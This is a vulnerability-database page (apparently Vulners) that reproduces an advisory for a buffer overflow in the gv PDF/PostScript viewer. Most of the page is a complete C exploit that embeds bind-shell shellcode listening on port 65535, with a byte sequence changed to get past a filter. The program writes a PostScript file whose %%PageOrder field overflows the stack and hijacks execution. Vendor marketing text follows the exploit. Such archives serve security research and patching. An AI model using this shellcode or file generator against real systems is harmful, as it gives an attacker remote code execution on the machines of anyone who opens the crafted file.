Vulners
Lucene search
GV 2.x/3.x Malformed PDF/PS File Buffer Overflow Vulnerability (1)
source: http://www.securityfocus.com/bid/5808/info
gv is a freely available, open source Portable Document Format (PDF) and PostScript (PS) viewing utility. It is available for Unix and Linux operating systems.
It has been reported that an insecure sscanf() function exists in gv. Due to this function, an attacker may be able to put malicious code in the %%PageOrder: portion of a file. When this malicious file is opened with gv, the code would be executed in the security context of the user opening the file.
// gv <=3.5.8 remote exploit by priestmaster
#include <stdio.h>
#define STDALIGN 264 // Standard align
#define SCBUF 800 // Shellcode buffer size
#define GARBAGE 100 // Garbage for the end
// of the evil_buffer
#define NOP 'G' // instead of "\x90"
// Copyright (c) Ramon de Carvalho Valle
// Bind shell port number 65535
char bindcode[]= /* 72 bytes */
"\x31\xdb" /* xorl %ebx,%ebx */
"\xf7\xe3" /* mull %ebx */
"\x53" /* pushl %ebx */
"\x43" /* incl %ebx */
"\x53" /* pushl %ebx */
"\x6a\x02" /* pushl $0x02 */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\xff\x49\x02" /* decl 0x02(%ecx) */
"\x6a\x10" /* pushl $0x10 */
"\x51" /* pushl %ecx */
"\x50" /* pushl %eax */
"\x89\xe1" /* movl %esp,%ecx */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x89\x41\x04" /* movl %eax,0x04(%ecx) */
"\xb3\x04" /* movb $0x04,%bl */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x43" /* incl %ebx */
"\xb0\x66" /* movb $0x66,%al */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x93" /* xchgl %eax,%ebx */
"\xb0\x3f" /* movb $0x3f,%al */
"\xcd\x80" /* int $0x80 */
"\x49" /* decl %ecx */
"\x79\xf9" /* jns <bindsocketshellcode+45> */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
//"\xb0\x0b" /* movb $0x0b,%al */
// 0b isn't allowed (filter). I use xor %eax, %eax
// and eleven inc %al. It's the same as \xb0\x0b
"\x31\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
"\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0\xfe\xc0"
"\xcd\x80"
;
// How to start the exploit
void usage(char *prgname)
{
printf("\nUsage: %s align retaddr \n\n"
"align (0 on SUSE 7.0)\n"
"retaddr (return address (should point to shellcode))\n");
exit(0);
}
/////////////////////////////////////////
main(int argc, char **argv)
{
int align; // Align for the buffer
long retaddr; // return address
char buf[BUFSIZ]; // The evil buffer
char *p; // Pointer to evil buffer
if(argc != 3) // 2 Arguments required
{
usage(argv[0]);
}
// Get align and return address from parameters
align = atoi(argv[1]);
retaddr = strtoul(argv[2], 0 , NULL);
/* DEBUG, Shellcode testing
void (*dsr)();
(long) dsr = &bindcode;
dsr(); */
// Point to buffer
p = buf;
// Memset the buffer with NOP's
memset(p, NOP, BUFSIZ);
p += STDALIGN+align;
// Write return address in buffer (It's a very simple stack overflow).
*((void **)p) = (void *) retaddr;
p+=4;
// Put shellcode in buffer
p+=SCBUF-strlen(bindcode)-1;
memcpy(p, bindcode, strlen(bindcode));
p += strlen(bindcode);
// Add some garbage to end of buffer
p += GARBAGE;
// Null terminate buffer
*p = 0;
// Generate pdf file
printf("%%!PS-Adobe-3.0\n");
printf("%%%%Creator: groff 1.16 (with modifications by zen-parse by hand 1.00a)\n");
printf("%%%%CreationDate: Sat Jun 15 15:30ish\n");
// In page order, the stack overflow occur.
printf("%%%%PageOrder: %s\n", buf);
printf("%%%%EndComments\n");
printf("%%%%EOF");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1